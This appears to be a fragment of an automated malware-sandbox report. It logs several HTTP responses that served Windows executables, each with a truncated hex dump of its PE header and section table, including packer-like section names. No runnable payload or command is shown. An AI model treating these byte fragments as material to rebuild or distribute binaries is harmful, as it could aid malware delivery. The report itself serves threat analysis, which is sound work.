Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:43 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 13:51:59 GMTETag: "1c9e00-6231a28b79a3f"Accept-Ranges: bytesContent-Length: 1875456Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 40 6b 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 6b 00 00 04 00 00 4b f9 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6c 62 79 78 62 65 6d 00 40 1a 00 00 f0 50 00 00 3a 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6e 64 77 63 70 6d 74 00 10 00 00 00 30 6b 00 00 06 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 6b 00 00 22 00 00 00 7c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:47 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 14:10:49 GMTETag: "1d6400-6231a6c1293ff"Accept-Ranges: bytesContent-Length: 1926144Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 24 6d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 37 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 37 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6d 6a 63 78 68 6d 77 00 50 1a 00 00 f0 31 00 00 4a 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 71 73 69 64 68 77 65 00 10 00 00 00 40 4c 00 00 04 00 00 00 3e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 42 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 14:18:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:51 GMTContent-Type: application/octet-streamContent-Length: 3643904Last-Modified: Thu, 26 Sep 2024 19:28:15 GMTConnection: keep-aliveETag: "66f5b5cf-379a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 80 02 85 16 00 00 00 00 00 00 00 00 f0 00 02 01 0b 02 08 00 00 5c 23 00 00 3c 14 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 23 00 ac 3a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 5b 23 00 00 20 00 00 00 5c 23 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 3a 14 00 00 80 23 00 00 3c 14 00 00 5e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 58 e5 22 00 54 96 00 00 00 00 02 00 4e 00 00 06 a4 b7 00 00 b2 2d 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 7e 19 bc 80 fc 50 74 80 66 ad 9d 4c 5e 5b 31 e4 77 a8 75 91 fd a0 ce d2 95 17 42 5a c5 46 14 82 e4 aa 21 9b ea df fa 2d 0e 28 9b 04 83 45 11 e2 21 6c 04 7c c1 49 c9 dd 49 e8 ea e5 0d 19 b9 1f 98 1b 66 b2 39 94 f9 96 ac 48 83 d4 04 ca 4f 4f 05 5f 39 58 42 96 c0 9b e0 43 52 01 f4 15 1f f3 6e 7c 6b 68 de 5e a9 8b 72 6c cf 79 c5 f3 d8 7e 99 9a df ad df 60 db 02 5a ca d0 f4 42 f8 a0 97 28 8e 65 87 5f e6 70 a6 b4 ac e5 d4 c6 46 d5 eb 6a d3 67 5a 34 70 13 0e 9f 68 0d 14 8c b3 48 79 ca 37 50 36 8d 51 1e b1 29 39 f7 32 79 07 3a 13 f3 e4 8a 6e 90 46 62 b7 7a 57 e6 f5 d8 5c 19 01 63 6c 09 8e f5 9e 5d 18 b4 b4 31 f9 77 e0 93 98 2d f9 1f a7 28 d9 e7 84 d4 97 ba 36 69 28 d7 cb 20 f6 ce 0d fc ab 1d 55 86 72 b9 db 14 67 40 99 c2 4e c7 de 3d 71 d8 89 83 83 b8 5d e2 27 ad 8b db 64 d9 80 12 86 9a 81 db c8 20 b5 1f 0b 70 6c 57 21 72 1b 5f f8 8e ad 1d 44 88 78 f1 be 71 5f c3 2d fe af 8d bf 87 3c b2 46 03 73 51 23 69 78 13 4c 06 c1 b3 92 2b e2 d5 2c 62 cc fd 22 8e 1c 57 c0 f1
